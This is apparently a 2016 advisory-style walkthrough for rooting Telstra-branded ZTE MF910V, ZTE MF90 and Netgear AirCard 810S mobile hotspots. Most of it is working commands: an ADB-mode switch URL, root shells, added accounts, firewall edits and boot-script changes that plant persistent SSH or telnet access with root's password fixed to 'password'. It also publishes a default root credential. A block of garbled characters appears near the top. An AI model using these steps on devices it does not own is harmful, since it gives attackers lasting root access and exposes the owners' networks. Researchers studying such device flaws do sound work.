Majority of this info was found from the 4dpa.ru forum but works well on Telstra Mobile routers. Telstra has been contacted and do not see it as a security issue so have fun messing with your 4g routers, not much of a security issue but if you find it useful i had a boring afternoon and took a look. Also just managed to grab my lizardsquad.ru domain back so figured what a fun way to release security vulnerabilities. Please excuse the poor explaination as this is the first time I've wrote one of this. Author of advisory: David Crees ak/a abdilo Email: admin@aussi.es Twitter: @abdilo__ Website link to advisory: https://lizardsquad.ru/index.html Discovery Date: Sep 30th, 2016 All devices have default credentials of: root:oelinux123 if you want to skip adding user and changing root password steps I'm sure if anyone put more then 12 hours of effort into this it would work well. ------------------------------------------------------------ Vulnerable Portable Wi-Fi Router #1: Device: Pre-Paid Telstra 4GX Portable WI-FI Router Model: ZTE MF910V ISP: Telstra Uname -a: Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux Link: http://www.ztemobiles.com.au/MF910B.htm ------------------------------------------------------------ Thanks: http://4pda.ru/ Without 4pda.ru this would of taken days and not a few hours, hats off to you guys even though i can't gain an account(cant type russian captcha) on your site, it was very useful. ------------------------------------------------------------ D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aC/ND2aC/N D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/a D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aa!D2aa!D2aa!D2aa!D2aC/aD2aC/ND2aa!D2aa!D2aC/aD2aa!D2aa!D2aC/a D2aC/ND2aa!D2aa!D2aa!D2aa!D2aC/a D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/ND2aC/N D2aC/ND2aC/ND2aC/ND2aC/ND2aC/N Step #1 ------------------------------------------------------------ Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb devices (Starts ADB) Step #2 ------------------------------------------------------------ Login to http://192.168.0.1/ with default factory new password "password" Once logged on go to: http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6 (Device is now in ADB mode) Step #3 ------------------------------------------------------------ Go back to cmd.exe and execute these commands: C:\> adb devices List of devices attached PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install) C:\> adb shell / # (You now have a root adb shell) Step #4 ------------------------------------------------------------ Add new user from adb root shell: mdm9625:~# adduser -s /bin/sh -S newuser mdm9625:~# passwd newuser (enter "newuser") (The user newuser@192.168.0.1 has been created) Step #5 ------------------------------------------------------------ Remove old ip tables rulings to get ssh back temporarily: / # iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT / # iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT (SSH is now re-enabled) Step #6 ------------------------------------------------------------ Edit /usr/zte/zte_conf/scripts/firewall_init.sh with vi. Add a "#" infront of lines 92 and 93 as seen below (press the insert key to start typing, once typed CTRL+C, then type :wq, and press enter): #iptables -t filter -I INPUT -p tcp --dport 22 -j DROP #iptables -t filter -I INPUT -p udp --dport 22 -j DROP (This will stop firewall_init.sh from disabling ssh on reboots and factory resets) Step #7 -------------------------------------------------------- Append the following to the bottom of firewall_init.sh using vi(same steps for using vi as above): echo "password password "|passwd (This will change the root user's password at boot to "password", if you do not do this when you reboot the device the root password will change) Step #8 ------------------------------------------------------------ Reboot the device. (This will now disable ADB mode and the device will start normally) Step #9 ------------------------------------------------------------ Connect to the Telstra 4GX Router's wifi signal. Step #10------------------------------------------------------------ Now SSH into the Router: Open PuTTY.exe Enter "192.168.0.1" into "Host Name or IP Address" and click "Open". (A new window will apear follow directions bellow) login as: newuser newuser@192.168.0.1's password: (enter the password "newuser") mdm9625:~$ whoami newuser mdm9625:~$ su Password: (enter the word "password") mdm9625:/# whoami root mdm9625:/# uname -a Linux mdm9625 3.4.0+ #1 PREEMPT Mon Oct 26 21:47:30 CST 2015 armv7l GNU/Linux mdm9625:/# id uid=0(root) gid=0(root) groups=0(root) mdm9625:/# (Alternatively you can login as the root user directly instead of going through this extra step) Step #11------------------------------------------------------------ Enjoy your persistent root shell. You can even restore device to factory settings via the webpanel or by pressing the button on the device and your shell account still stays persistent with ssh enabled and root's password stuck set as "password". ------------------------------------------------------------ ------------------------------------------------------------ -------------------Bonus Part 2:---------------------------- ------------------------------------------------------------ ------------------------------------------------------------ Device: Pre-Paid Telstra My Pocket Wi-Fi 3G Lite Model: ZTE MF90 ISP: Telstra Link: http://www.ztemobiles.com.au/MF90.htm Step #1 ------------------------------------------------------------ Plug your Telstra 3G Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb devices (Starts ADB) Step #2 ------------------------------------------------------------ Login to http://192.168.0.1/ with default factory new password "password" Once logged on go to: http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=6 (Device is now in ADB mode) Step #3 ------------------------------------------------------------ Go back to cmd.exe and execute these commands: C:\> adb devices List of devices attached PXXXXXXXXD000000 device (Your Telstra Hotspot Device Should Apear Here, if it did not then retry beginning steps or wait for drivers to install) C:\> adb shell / # (You now have a root adb shell) Step #4 ------------------------------------------------------------ Add new user from adb root shell: mdm9625:~# adduser -s /bin/sh -S newuser mdm9625:~# passwd newuser (enter "newuser") (The user newuser@192.168.0.1 has been created) Step #5 ------------------------------------------------------------ Edit /usr/zte/zte_conf/scripts/firewall_filter_init.sh with vi. Enter the below text at the bottom of the script: echo "password password "|passwd telnetd -F -p 23 & echo "firewall init done" #nat.sh (This is guarentee admin password is password and enables telnet) ------------------------------------ Open with vi /usr/zte/zte_conf/scripts/firewall_init.sh Enter the below text above the (echo "firewall init done") line. iptables -t filter -I INPUT -p tcp --dport 23 -j ACCEPT iptables -t filter -I INPUT -p udp --dport 23 -j ACCEPT iptables -t filter -I OUTPUT -p udp --dport 23 -j ACCEPT iptables -t filter -I OUTPUT -p tcp --dport 23 -j ACCEPT echo "firewall init done" #nat.sh (This allows telnet through the firewall) ----------------------------------------------------- Reboot it Voila ------------------------------------------------------------ ------------------------------------------------------------ -------------------Bonus Part 3:---------------------------- ------------------------------------------------------------ ------------------------------------------------------------ After realizing how easy it was to root the past two i went out and purchased the brand new Telstra 4GX Advanced III with AirCard Smart Cradle Model DC112A and the Telstra 4GX Advanced II both outright to avoid Telstra claiming i damaged their goods.(Havn't had success with the Telstra 4GX Advanced II yet ak/a NetGear AirCard 790s). Vulnerable Portable Wi-Fi Router: Device: Telstra 4GX Advanced III Model: Netgear AirCard 810S Mobile Hotspot ISP: Telstra Uname -a: Linux mdm9640 3.10.49-svn2309 #1 PREEMPT Thu Sep 3 14:53:22 PDT 2015 armv7l GNU/Linux Link: http://www.netgear.com.au/home/products/mobile-broadband/hotspots/AC810S.aspx?cid=wmt_netgear_organic Step #1 ------------------------------------------------------------ Plug your Telstra 4GX Router into a usb 2.0 slot on your current computer. Open up cmd.exe: cmd.exe > adb start-server cmd.exe > adb connect 192.168.1.1 cmd.exe > adb shell (This will spawn a root shell) --------------------------- Edit /etc/mdev/ntgr-setupinput.sh with vi and enter the bellow text as follows: Add "telnetd-F -p23 &" underneath # NTGRSTART and above MDEV. Save the file ------------------------------ File should look like: #!/bin/sh # NTGRSTART telnetd -F -p 23 & MDEV=`echo $MDEV | sed 's#input/##g'` # Detect touchscreen MSG2133 - driver provides following: # b0018 - bus I2C # v1B20 - MStar Semiconductor USB vendor ID # p2133 - product ID (made up from model name) # Our driver writes these (exccept bus) to input ID strucutre if [ `egrep "input:b0018v1B20p2133*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/touchscreen0 fi # Detect power key if [ `egrep "input:.*-e0.*,.*k74,.*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/pwr_key0 fi # Detect touchscreen/button CY8CMBR3108 - driver provides following: # b0018 - bus I2C # v04B4 - Cypress USB vendor ID # p3108 - product ID (made up from model name) # Our driver writes these (exccept bus) to input ID strucutre if [ `egrep "input:b0018v04B4p3108*" /sys/class/input/$MDEV/device/modalias|wc -l` -gt 0 ]; then ln -sf /dev/input/$MDEV /dev/input/touchscreen0 fi # NTGRSTOP ------------------------ reboot the device ----------------------- login via telnet with: root:oelinux123 Voila you now have root access ---------------------------------------------------------------------------------------------------------------------- The 16-year-old only has to be right once. You have to be right all the time.